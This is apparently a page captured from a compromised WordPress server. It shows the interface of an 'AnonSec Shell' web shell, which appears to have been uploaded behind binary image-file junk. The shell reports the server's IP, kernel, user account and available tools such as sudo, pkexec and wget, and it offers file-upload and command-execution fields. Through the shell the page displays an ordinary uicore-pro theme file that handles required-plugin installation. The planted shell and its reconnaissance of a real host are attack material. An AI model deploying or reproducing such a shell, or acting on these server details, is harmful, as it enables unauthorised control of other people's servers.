%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.217.36
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/public_html/wp-content/themes/uicore-pro/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/public_html/wp-content/themes/uicore-pro/inc/plugin-activation.php
<?php

/**
 * Custom template tags for this theme
 *
 * Eventually, some of the functionality here could be replaced by core features.
 *
 * @package uicore-theme
 */
defined('ABSPATH') || exit;
// delete_option('uicore_is_gutenberg');
global $pagenow;
// redirect to welcome page after theme activation
if ( ! empty( $_GET['activated'] ) && 'true' == $_GET['activated'] && $pagenow == "themes.php" && defined('UICORE_VERSION') ){
    wp_redirect( self_admin_url('admin.php?page=uicore#/') );
}


function uicore_ajax_plugins(){
    if ( ! check_ajax_referer( 'uicore_setup_nonce', 'wpnonce' ) || empty( $_POST['slug'] ) ) {
        wp_send_json_error( array( 'error' => 1, 'message' => esc_html__( 'No Slug Found', 'uicore-pro' ) ) );
    }
    $json = array();
    // send back some json we use to hit up TGM
    $plugins = uicore_get_plugins();

    foreach ( $plugins as $plugin ) {
        if ( $_POST['slug'] == $plugin['slug'] ) {
            $json = array(
                'url'           => admin_url( 'themes.php?page=tgmpa-install-plugins' ),
                'plugin'        => array( $plugin['slug'] ),
                'tgmpa-page'    => 'tgmpa-install-plugins',
                'plugin_status' => 'all',
                '_wpnonce'      => wp_create_nonce( 'bulk-plugins' ),
                'action'        => 'tgmpa-bulk-install',
                'action2'       => - 1,
                'message'       => esc_html__( 'Installing...', 'uicore-pro' ),
            );
            break;
        }
    }

    if ( $json ) {
        wp_send_json( $json );
    }
    exit;

}
add_action( 'wp_ajax_uicore_plugins', 'uicore_ajax_plugins' );


function uicore_get_plugins(){
    // If _uicore_pro does not exist, always return Elementor stack
    if (!function_exists('_uicore_pro')) {
        return array(
            array(
                'name'     => 'UiCore Framework',
                'slug'     => 'uicore-framework',
                'source'   => 'uicore-framework.zip',
                'required' => true,
                'version'  => defined('UICORE_FRAMEWORK_VERSION') ? UICORE_FRAMEWORK_VERSION : '',
            ),
            array(
                'name'     => 'Elementor',
                'slug'     => 'elementor',
                'required' => true,
            ),
            array(
                'name'     => 'UiCore Animate',
                'slug'     => 'uicore-animate',
                'required' => true,
            ),
            array(
                'name'     => 'UiCore Elements',
                'slug'     => 'uicore-elements',
                'required' => true,
            ),
        );
    }
    // If builder choice is set, return correct stack
    $is_gutenberg = get_option('uicore_is_gutenberg', null) === 'true';
    if (isset($_GET['uicore_builder_choice'])) {
        $is_gutenberg = $_GET['uicore_builder_choice'] === 'gutenberg';
    }
    if ($is_gutenberg) {
        return array(
            array(
                'name'     => 'UiCore Framework',
                'slug'     => 'uicore-framework',
                'source'   => 'uicore-framework.zip',
                'required' => true,
                'version'  => defined('UICORE_FRAMEWORK_VERSION') ? UICORE_FRAMEWORK_VERSION : '',
            ),
            array(
                'name'     => 'UiCore Blocks',
                'slug'     => 'uicore-blocks',
                'required' => true,
            ),
            array(
                'name'     => 'UiCore Animate',
                'slug'     => 'uicore-animate',
                'required' => true,
            ),
        );
    } else {
        return array(
            array(
                'name'     => 'UiCore Framework',
                'slug'     => 'uicore-framework',
                'source'   => 'uicore-framework.zip',
                'required' => true,
                'version'  => defined('UICORE_FRAMEWORK_VERSION') ? UICORE_FRAMEWORK_VERSION : '',
            ),
            array(
                'name'     => 'Elementor',
                'slug'     => 'elementor',
                'required' => true,
            ),
            array(
                'name'     => 'UiCore Animate',
                'slug'     => 'uicore-animate',
                'required' => true,
            ),
            array(
                'name'     => 'UiCore Elements',
                'slug'     => 'uicore-elements',
                'required' => true,
            ),
        );
    }
}
require_once get_template_directory() . '/inc/class-tgm-plugin-activation.php';
if (!function_exists('uicore_plugins_activation')) :

    function uicore_plugins_activation()
    {

        $plugins = uicore_get_plugins();

        $config = array(
            'id'           => 'uicore-pro',            // Unique ID for hashing notices for multiple instances of TGMPA.
            'default_path' => get_template_directory() . "/inc/plugins/",                      // Default absolute path to bundled plugins.
            'menu'         => 'tgmpa-install-plugins', // Menu slug.
            'has_notices'  => true,                   // Show admin notices or not.
            'dismissable'  => true,                    // If false, a user cannot dismiss the nag message.
            'dismiss_msg'  => '',                      // If 'dismissable' is false, this message will be output at top of nag.
            'is_automatic' => true,                   // Automatically activate plugins after installation or not.
            'message'      => '',                      // Message to output right before the plugins table.

            'strings'      => array(
                'page_title'                      => esc_attr__( 'Install Recommended Plugins', 'uicore-pro' ),
                'menu_title'                      => esc_attr__( 'Install Plugins', 'uicore-pro' )
            )
        );

        tgmpa($plugins, $config);
    }
endif;
add_action('tgmpa_register', 'uicore_plugins_activation');

/**
 * Get plugin activate link
 *
 * @return string               Activate plugin link
 */
function uicore_get_plugin_activation_link( $plugin_base_name, $slug, $plugin_filename ) {
    $activate_nonce = wp_create_nonce( 'activate-plugin_' . $slug .'/'. $plugin_filename );
    return self_admin_url( 'plugins.php?_wpnonce=' . $activate_nonce . '&action=activate&plugin='. str_replace( '/', '%2F', $plugin_base_name ) );
}

/**
 * Get install link
 *
 * @param  string  $plugin_slug The plugin slug
 *
 * @return string               Install plugin link
 */
function uicore_get_plugin_install_link( $plugin_slug ){

    // sanitize the plugin slug
    $plugin_slug = esc_attr( $plugin_slug );

    $install_link  = wp_nonce_url(
        add_query_arg(
            array(
                'action' => 'install-plugin',
                'plugin' => $plugin_slug,
            ),
            network_admin_url( 'update.php' )
        ),
        'install-plugin_' . $plugin_slug
    );

    return $install_link;
}


/**
 * Creates and returns attributes for a dom
 *
 * @param  array        $attrs   List of attributes and their values
 *
 * @return string                HTML attribute string
 */
function uicore_make_html_attributes( $attrs = array() ){

    if( ! is_array( $attrs ) ){
        return '';
    }

    $attributes_string = '';

    foreach ( $attrs as $attr => $value ) {
        $value = is_array( $value ) ? join( ' ', array_unique( $value ) ) : $value;
        $attributes_string .= sprintf( '%s="%s" ', $attr, esc_attr( trim( $value ) ) );
    }

    return $attributes_string;
}

/**
 * Display a notice for installing theme core plugin
 *
 * @return void
 */
function uicore_plugin_notice(){
    if ( get_transient( 'uicore-fw-notice_' . UICORE_THEME_NAME ) ) {
        return;
    }
    // Check if builder choice is set, otherwise default to Elementor
    $is_gutenberg = get_option('uicore_is_gutenberg', null) === 'true';
    if (isset($_GET['uicore_builder_choice'])) {
        $is_gutenberg = $_GET['uicore_builder_choice'] === 'gutenberg' ;
        update_option('uicore_is_gutenberg', $is_gutenberg ? 'true' : 'false');
    }

    // Define plugin requirements for each builder
    $elementor_plugins = array(
        'base_name' => array(
            'uicore-framework/plugin.php',
            'elementor/elementor.php',
            'uicore-animate/plugin.php',
            'uicore-elements/plugin.php',
        ),
        'slug' => array(
            'uicore-framework',
            'elementor',
            'uicore-animate',
            'uicore-elements',
        ),
        'filename' => array(
            'plugin.php',
            'elementor.php',
            'plugin.php',
            'plugin.php',
        ),
        'title' => array(
            __('UiCore Framework', 'uicore-pro'),
            __('Elementor', 'uicore-pro'),
            __('UiCore Animate', 'uicore-pro'),
            __('UiCore Elements', 'uicore-pro'),
        ),
        'class_check' => array(
            '\UiCore\Core',
            '\Elementor\Plugin',
            '\UiCoreAnimate\Base',
            '\UiCoreElements\Base',
        ),
    );
    $gutenberg_plugins = array(
        'base_name' => array(
            'uicore-framework/plugin.php',
            'uicore-blocks/plugin.php',
            'uicore-animate/plugin.php',
        ),
        'slug' => array(
            'uicore-framework',
            'uicore-blocks',
            'uicore-animate',
        ),
        'filename' => array(
            'plugin.php',
            'plugin.php',
            'plugin.php',
        ),
        'title' => array(
            __('UiCore Framework', 'uicore-pro'),
            __('UiCore Blocks', 'uicore-pro'),
            __('UiCore Animate', 'uicore-pro'),
        ),
        'class_check' => array(
            '\UiCore\Core',
            '\UiCoreBlocks\Base',
            '\UiCoreAnimate\Base',
        ),
    );
    $plugins = $is_gutenberg ? $gutenberg_plugins : $elementor_plugins;

    $installed_plugins  = get_plugins();
    $not_installed_or_activated_plugins_id = array();
    foreach ( $plugins['base_name'] as $key => $plugin_base_name ) {
        if( ! isset( $installed_plugins[ $plugin_base_name ] ) || ! class_exists( $plugins['class_check'][$key] ) ){
            $not_installed_or_activated_plugins_id[] = $key;
        }
    }
    // If all required plugins are installed and active, do not show the notice
    if (empty($not_installed_or_activated_plugins_id) && ((function_exists('_uicore_pro') && get_option('uicore_is_gutenberg', null) !== null) || !function_exists('_uicore_pro'))) {
        return;
    }
    // get information of required plugins which is not installed or not activated
    foreach ( $not_installed_or_activated_plugins_id as $key => $value ) {
        $not_installed_plugins_number = count( $not_installed_or_activated_plugins_id );
        $progress_text = $not_installed_plugins_number > 1 ? ( $key + 1 ). " / {$not_installed_plugins_number}" : "";
        $progress_text_and_title = $progress_text . ' - ' .$plugins['title'][ $value ];
        $links_attrs[$key] = array(
            'data-plugin-slug'      => $plugins['slug'][$value],
            'data-activating-label' => sprintf( esc_attr__( 'Activating %s', 'uicore-pro' ), $progress_text_and_title ),
            'data-installing-label' => sprintf( esc_attr__( 'Installing %s', 'uicore-pro' ), $progress_text_and_title ),
            'data-activate-label'   => sprintf( esc_attr__( 'Activate %s'  , 'uicore-pro' ), $progress_text_and_title ),
            'data-install-label'    => sprintf( esc_attr__( 'Install %s'   , 'uicore-pro' ), $progress_text_and_title ),
            'data-activate-url'     => uicore_get_plugin_activation_link( $plugins['base_name'][$value], $plugins['slug'][$value], $plugins['filename'][$value] ),
            'data-install-url'      => uicore_get_plugin_install_link( $plugins['slug'][$value] ),
            'data-redirect-url'     => self_admin_url('admin.php?page=uicore#/'),
            'data-num-of-required-plugins' => $not_installed_plugins_number,
            'data-plugin-order'     => $key + 1,
            'data-wpnonce'          => wp_create_nonce( 'uicore_setup_nonce' )
        );
        if( ! isset( $installed_plugins[ $plugins['base_name'][$value] ] ) ){
            $links_attrs[$key]['data-action'] = 'install';
            $links_attrs[$key]['href'] = $links_attrs[ $key ]['data-install-url'];
            $links_attrs[$key]['button_label'] = sprintf( esc_html__( 'Install %s', 'uicore-pro' ), $progress_text_and_title );
        } elseif( ! class_exists( $plugins['class_check'][ $value ] ) ) {
            $links_attrs[$key]['data-action'] = 'activate';
            $links_attrs[$key]['href'] = $links_attrs[ $key ]['data-activate-url'];
            $links_attrs[$key]['button_label'] = sprintf( esc_html__( 'Activate %s', 'uicore-pro' ), $progress_text_and_title );
        }
    }
?>
<script>
/**
 * Ajax install the Theme Core Plugin
 *
 */
(function($, window, document, undefined){
    "use strict";

    $(function(){

        $('.uicore-btn-install').on( 'click', function( event ) {
            var $button = $( event.target );
            event.preventDefault();

            if ( $button.hasClass( 'updating-message' ) || $button.hasClass( 'button-disabled' ) ) {
                return;
            }

            /**
             * Install a plugin
             *
             * @return void
             */
            function installPlugin($data){
                if ( $data['data-plugin-slug'] == 'uicore-framework' ) {
                    var _ajaxData = {
                        action: "uicore_plugins",
                        wpnonce: $data['data-wpnonce'],
                        slug: 'uicore-framework',
                        plugins: ['uicore-framework']
                    };
                    globalAjax(
                        '<?php echo admin_url( 'admin-ajax.php' ); ?>',
                        'POST',
                        _ajaxData,
                        function () { // beforeSend callback
                            buttonStatusInProgress( $data['data-installing-label']  );
                        },
                        function ( response ){ // success callback
                            console.log(response);
                            if ( response.url ) {
                                globalAjax(
                                    response.url,
                                    'POST',
                                    response,
                                    function(){}, // beforeSendCallback
                                    function(){ // success callback
                                        buttonStatusInstalled( 'All plugins installed and activated sucessfully!' );
                                        activatePlugin($data);
                                    },
                                    function(){} // error callback
                                );
                            }
                        },
                        function () { // error callback
                            buttonStatusDisabled( 'Error!' );
                            return false;
                        }
                    );
                } else {
                    globalAjax(
                        $data['data-install-url'],
                        'GET',
                        {},
                        function(){ // beforeSend callback
                           buttonStatusInProgress( $data['data-installing-label']  );
                        },
                        function(){ // success callback
                            buttonStatusInstalled( 'All plugins installed and activated sucessfully!' );
                            activatePlugin($data);
                        },
                        function() { // error callback
                            buttonStatusDisabled( 'Error!' );
                            return false;
                        }
                    );
                }
            }

            /**
             * global AJAX callback
             */
            function globalAjax( _url, _type, _data, _beforeSendCallback, _successCallback, _errorCallback ) {
                $.ajax({
                    url: _url,
                    type: _type,
                    data: _data,
                    beforeSend: _beforeSendCallback,
                    success: _successCallback,
                    error: _errorCallback
                });
            }

            /**
             * Activate a plugin
             *
             * @return void
             */
            function activatePlugin( $data ){

                globalAjax(
                    $data['data-activate-url'],
                    'GET',
                    {},
                    function () { // beforeSend callback
                        buttonStatusInProgress( $data['data-activating-label'] );
                    },
                    function () { // success callback
                        buttonStatusDisabled(  'All plugins intalled and activated sucessfully!' );
                        run( $data['data-plugin-order'] );
                    },
                    function (xhr) {
                        buttonStatusDisabled( 'Error!' );
                        return false;
                    }
                );

            }

            /**
             * Change button status to in-progress
             *
             * @return void
             */
            function buttonStatusInProgress( message ){
                $button.addClass('updating-message').removeClass('button-disabled installed').text( message );
            }

            /**
             * Change button status to disabled
             *
             * @return void
             */
            function buttonStatusDisabled( message ){
                $button.removeClass('updating-message installed')
                        .addClass('button-disabled')
                        .text( message );
            }

            /**
             * Change button status to installed
             *
             * @return void
             */
            function buttonStatusInstalled( message ){
                $button.removeClass('updating-message')
                        .addClass('installed')
                        .text( message );
            }

            const $plugins_info = $button.data('info');
            function run($key = 0) {
                if (typeof $plugins_info[$key] == 'undefined' || $plugins_info[$key]['data-plugin-order'] > $plugins_info[0]['data-num-of-required-plugins'] ) {
                    location.replace( $plugins_info[$plugins_info.length - 1]['data-redirect-url'] );
                    return;
                }
                let $this = $plugins_info[$key];
                if( $this['data-action'] === 'install' ){
                    installPlugin($this);
                } else if( $this['data-action'] === 'activate' ){
                    activatePlugin($this);
                }
            }
            run();

        });

    });

})(jQuery, window, document);
</script>
<style>
.uicore-msg{
    background-size: 900px;
    background-position: center right;
    background-repeat: no-repeat;
    background-color: #c8ff63;
    color: black;
    padding: 35px 60px;
    margin: 5px 20px 5px 2px;
    position: relative;
    border: 1px solid #ccd0d4;
    box-shadow: 0 1px 1px rgba(0,0,0,.04), inset 10px 10px 0 #fff, inset -10px -10px 0 #fff;

}
.uicore-title-default{
    color:black;
    font-size: 32px;
}
.uicore-description-default{
    color: black;
    font-size: 18px;
    opacity: .7;
    max-width: calc(100% - 550px);
}
.uicore-btn-default{
  line-height: 50px;
  font-weight: 500;
  text-align: center;
  color: white;
  border-radius: 4px;
  background: black;
  cursor: pointer;
  display: inline-block;
  text-decoration: none;
  position: relative;
  transition: all 0.2s ease-in-out;
  font-size: 16px;
  padding:0 40px;
}
.uicore-btn-default:hover{
    background:rgba(255, 255, 255, .85);
    color:#1b0c5d;
}
.uicore-close::before{
    font-size: 16px;
}
.uicore-close {
  text-decoration: none;
  top: 3px;
  right: 3px;
}
.uicore-close:hover::before{
    text-decoration: none;
}
.uicore-btn-active {
    background: #1b0c5d !important;
    color: #fff !important;
    border: 2px solid #1b0c5d;
}
</style>
    <div class="uicore-msg" style="background-image:url(<?php echo esc_url(get_template_directory_uri()); ?>/assets/img/demo-import-bg.jpg)">
        <h3 class="uicore-title-default"><?php printf( __( 'Thanks for choosing %s', 'uicore-pro' ), UICORE_THEME_NAME ); ?></h3>
        <?php if (function_exists('_uicore_pro')) : ?>
            <?php if (get_option('uicore_is_gutenberg', null) !== null) : ?>
                <p class="uicore-description-default"><?php echo __( 'Please install and activate the required plugins to gain access to all the theme functionalities and features.', 'uicore-pro' ); ?></p>
            <?php else : ?>
                <p class="uicore-description-default"><?php echo __( 'Please select the main builder you want to use', 'uicore-pro' ); ?></p>
            <?php endif; ?>
            <?php if (!isset($_GET['uicore_builder_choice']) && get_option('uicore_is_gutenberg', null) === null) : ?>
            <div style="margin-bottom: 20px;">
                <a href="<?php echo esc_url( add_query_arg( 'uicore_builder_choice', 'elementor' ) ); ?>" class="uicore-btn-default" style="margin-right:10px;">
                    <?php _e('Use Elementor', 'uicore-pro'); ?>
                </a>
                <a href="<?php echo esc_url( add_query_arg( 'uicore_builder_choice', 'gutenberg' ) ); ?>" class="uicore-btn-default">
                    <?php _e('Use Gutenberg', 'uicore-pro'); ?>
                </a>
            </div>
            <?php endif; ?>
        <?php else : ?>
            <p class="uicore-description-default"><?php echo __( 'Please install and activate the required plugins to gain access to all the theme functionalities and features.', 'uicore-pro' ); ?></p>
        <?php endif; ?>
        <?php if ((function_exists('_uicore_pro') && get_option('uicore_is_gutenberg', null) !== null) || !function_exists('_uicore_pro')) : ?>
        <p class="submit">
            <a class="uicore-btn-default uicore-btn-install" data-info='<?php echo wp_json_encode( $links_attrs);?>' >Install Required Plugins</a>
            <a href="<?php echo esc_url( wp_nonce_url( add_query_arg( 'uicore-fw-notice', 'install' ), 'uicore-fw-notice', '_notice_nonce' ) ); ?>" class="notice-dismiss uicore-close"><span class="screen-reader-text"><?php _e( 'Skip', 'uicore-pro' ); ?></span></a>
        </p>
        <?php endif; ?>
    </div>
<?php
}
add_action( 'admin_notices', 'uicore_plugin_notice' );

function uicore_hide_notice() {

    if ( isset( $_GET['uicore-fw-notice'] ) && isset( $_GET['_notice_nonce'] ) ) {
        if ( ! wp_verify_nonce( $_GET['_notice_nonce'], 'uicore-fw-notice' ) ) {
            wp_die( __( 'Authorization failed. Please refresh the page and try again.', 'uicore-pro' ) );
        }
        set_transient( 'uicore-fw-notice_' . UICORE_THEME_NAME, 1, MONTH_IN_SECONDS );
    }

}
add_action( 'wp_loaded', 'uicore_hide_notice' );

Anon7 - 2022
AnonSec Team